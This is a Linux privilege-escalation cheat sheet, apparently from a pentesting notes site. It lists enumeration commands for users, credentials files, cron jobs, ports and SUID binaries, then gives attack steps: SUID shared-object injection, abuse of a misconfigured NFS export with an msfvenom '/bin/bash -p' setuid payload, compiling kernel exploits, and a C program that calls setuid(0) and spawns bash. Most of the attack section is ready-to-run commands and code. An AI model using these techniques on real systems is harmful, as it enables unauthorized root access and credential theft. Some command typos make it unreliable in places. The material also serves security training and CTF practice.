Linux Privilege Escalation
OS & User Enumeration :
1
############################### User Enumeration ################################
2
​
3
whoami
4
id
5
sudo -l
6
cat /etc/passwd
7
ls -la /etc/shadow
8
​
9
################################# OS Enumeration #################################
10
​
11
cat /etc/issue
12
cat /etc/*-release
13
cat /proc/version
14
uname -a
15
arch
16
ldd --verion
17
​
18
################################# Installed tools ################################
19
​
20
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null
21
​
22
############################ File owners and permissions #########################
23
​
24
ls -la
25
find . -ls
26
history
27
cat ~/.bash_history
28
find / -type f -user <username> -readable 2> /dev/null # Readable files for user
29
find / -writable -type d 2>/dev/null # Writable files by the user
30
find /usr/local/ -type d -writable
31
​
32
################################## File mount ####################################
33
​
34
/mnt /media -> usb devices and other mounted disks
35
mount -> show all the mounted drives
36
df -h -> list all partitions
37
cat /etc/fstab # list all drives mounted at boot time
38
/bin/lsblk
39
​
40
#################################### Applications ################################
41
​
42
dpkg -l # for Debian based systems
43
​
44
##################################### Cron tabs ##################################
45
​
46
ls -lah /etc/cron*
47
cat /etc/crontab
48
ls -la /var/log/cron* # Locating cron logs
49
find / -name cronlog 2>/dev/null
50
grep "CRON" /var/log/cron.log # for locating running jobs from logs
51
grep CRON /var/log/syslog # grepping cron from syslog
52
​
53
​
54
#################################### Internal Ports ##############################
55
​
56
Netstat -alnp | grep LIST | grep port_num
57
Netstat -antp
58
netstat -tulnp
59
curl the listening ports
60
​
61
################################### Interesting DIRS #############################
62
/
63
/dev
64
/scripts
65
/opt
66
/mnt
67
/var/www/html
68
/var
69
/etc
70
/media
71
/backup
72
​
73
################################### SUID Binaries ################################
74
​
75
(https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/)
76
​
77
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
78
find / -perm -u=s -type f 2>/dev/null
79
find / -perm -4000 -user root 2>/dev/null
80
ldd /usr/bin/binary-name
81
strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"
82
​
83
################################# Firewall Enumeration ###########################
84
​
85
grep -Hs iptables /etc/*
86
​
87
############################### Kernal Modules ##################################
88
​
89
lsmod
90
/sbin/modinfo <mod name>
91
​
92
​
Copied!
PrivEsc Checklist :
SUID Shared Object Injection :
    Find a SUID binary that looks fishy
    strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"
    Match the shared object that sits in a path where you have write access
    create a shared object in the missing SO file name
    run the SUID binary
NFS Misconfiguration :
    cat /etc/exports
    On Kali
      mkdir /tmp/nfs
      mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs
      msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
      chmod +xs /tmp/nfs/shell.elf
    On Target
      /tmp/shell.elf

Kernel Exploits

    cat /proc/version
    uname -r
    uname -mrs
    cat /etc/lsb-release
    cat /etc/os-release
    gcc exploit.c -o exp
    Compile exploit in local machine and upload to remote machine
      gcc -m32 -Wl,--hash-style=both 9542.c -o 9542
      apt-get install gcc-multilib
Recover Deleted Files :
C Program to SetUID /bin/bash :
gcc -Wall suid.c -o exploit
sudo chown root exploit
sudo chmod u+s exploit
$ ls -l exploit -rwsr-xr-x 1 root users 6894 11 sept. 22:05 exploit
1
#include <unistd.h>
2
​
3
int main()
4
{
5
setuid(0);
6
execl("/bin/bash", "bash", (char *)NULL);
7
return 0;
8
}
Copied!
./exploit # whoami root
Tools :
Resources :
Last modified 5mo ago
Copy link